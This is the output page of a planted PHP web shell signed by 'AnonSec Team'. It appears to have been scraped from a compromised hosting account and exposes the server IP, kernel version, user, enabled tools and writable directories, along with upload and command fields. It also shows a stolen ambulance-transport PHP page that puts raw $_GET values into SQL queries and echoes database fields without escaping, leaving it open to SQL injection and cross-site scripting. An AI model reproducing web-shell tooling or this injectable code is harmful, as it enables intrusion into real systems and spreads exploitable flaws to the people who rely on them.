Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.145.97.100
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/show_Request_Transport.php
 
 <style>
                     
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>
 <?php
  	$sql ="SELECT * FROM Request_Transport WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo"
		    <h3 align='right'><a href='edit_showpage_RequestTransport.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]'><i class='fa fa-pencil-square-o' aria-hidden='true'></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3>";
		}
		?>
   <div class='center'>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Request_Transport WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Type of Ambulance: </td>
<td width='50%'>$rs[Type_Ambulance]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Scheduled Departure:  </td>
<td width='50%'>$rs[Departure]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  EN Route :  </td>
<td width='50%'>$rs[EN_Route]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Expected Drop At :  </td>
<td width='50%'>$rs[Loading_Startup]</td>
</tr>



<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Inspection Report :  </td>
<td width='50%'>$rs[Inspection_Report]</td>
</tr>



";
}
?>

				</table>
</div>


Anon7 - 2022
AnonSec Team